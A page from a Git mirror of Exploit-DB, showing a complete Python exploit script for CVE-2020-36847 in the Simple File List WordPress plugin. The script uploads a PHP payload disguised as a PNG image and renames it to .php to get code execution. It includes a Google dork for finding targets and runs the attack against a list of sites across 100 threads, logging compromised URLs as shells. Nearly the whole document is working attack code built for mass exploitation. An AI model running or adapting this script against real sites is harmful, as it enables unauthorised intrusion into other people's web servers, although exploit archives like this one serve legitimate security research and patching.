bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52371.py
Exploit-DB 599853959f DB: 2025-07-23 
13 changes to exploits/shellcodes/ghdb

Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow

Discourse 3.1.1 - Unauthenticated Chat Message Access

Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE

Simple File List WordPress Plugin 4.2.2 - File Upload to RCE

Joomla JS Jobs plugin 1.4.2 - SQL injection
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function

Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
2025-07-23 00:16:47 +00:00

103 lines
No EOL
3.2 KiB
Python
Executable file
Raw Permalink Blame History

# Exploit Title: Simple File List WordPress Plugin 4.2.2 - File Upload to RCE
# Google Dork: inurl:/wp-content/plugins/simple-file-list/
# Date: 2025-07-15
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/simple-file-list/
# Software Link:
https://downloads.wordpress.org/plugin/simple-file-list.4.2.2.zip
# Version: <= 4.2.2
# Tested on: Ubuntu 22.04
# CVE: CVE-2020-36847
#!/usr/bin/env python3
import requests
import sys, os
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urljoin
from colorama import Fore, init
init(autoreset=True)
HEADERS = {'User-Agent': 'Mozilla/5.0'}
PHP_PAYLOAD = "<?php echo 'Vuln!!!'; ?>"
UPLOAD_PATH = "wp-content/plugins/simple-file-list/ee-upload-engine.php"
RENAME_PATH = "wp-content/plugins/simple-file-list/ee-file-engine.php"
UPLOAD_FOLDER = "wp-content/uploads/simple-file-list/"
def FilterURLS(site):
site = site.strip()
if not site.startswith(('http://', 'https://')):
site = 'http://' + site
if not site.endswith('/'):
site += '/'
return site
def upload_payload(base):
upload_url = urljoin(base, UPLOAD_PATH)
try:
files = {'file': ('pwn.png', PHP_PAYLOAD, 'image/png')}
r = requests.post(upload_url, files=files, headers=HEADERS, timeout=10, verify=False)
r.raise_for_status()
result = r.json()
return result.get('file')
except Exception:
return None
def rename_payload(base, filename):
rename_url = urljoin(base, RENAME_PATH)
try:
new_name = filename[:-4] + '.php'
data = {'oldFile': filename, 'newFile': new_name}
r = requests.post(rename_url, data=data, headers=HEADERS, timeout=10, verify=False)
r.raise_for_status()
result = r.json()
return result.get('newFile')
except Exception:
return None
def exploit(site):
base = FilterURLS(site)
try:
filename = upload_payload(base)
if not filename:
print(Fore.RED + f"[Failed] - {site}")
return
newfile = rename_payload(base, filename)
if not newfile:
print(Fore.RED + f"[Failed] - {site}")
return
shell_url = urljoin(base, UPLOAD_FOLDER + newfile)
r = requests.get(shell_url, headers=HEADERS, timeout=10, verify=False)
if r.status_code == 200:
print(Fore.GREEN + f"[Exploited] - {shell_url}")
with open("shells_found.txt", "a") as f:
f.write(shell_url + "\n")
else:
print(Fore.RED + f"[Failed] - {site}")
except Exception:
print(Fore.RED + f"[Failed] - {site}")
def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} list.txt")
sys.exit(1)
targets_file = sys.argv[1]
if not os.path.isfile(targets_file):
print(f"File {targets_file} not found.")
sys.exit(1)
with open(targets_file) as f:
targets = [line.strip() for line in f if line.strip()]
with ThreadPoolExecutor(max_workers=100) as executor:
futures = [executor.submit(exploit, target) for target in targets]
for _ in as_completed(futures):
pass
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings()
main()
Reference in a new issue View git blame Copy permalink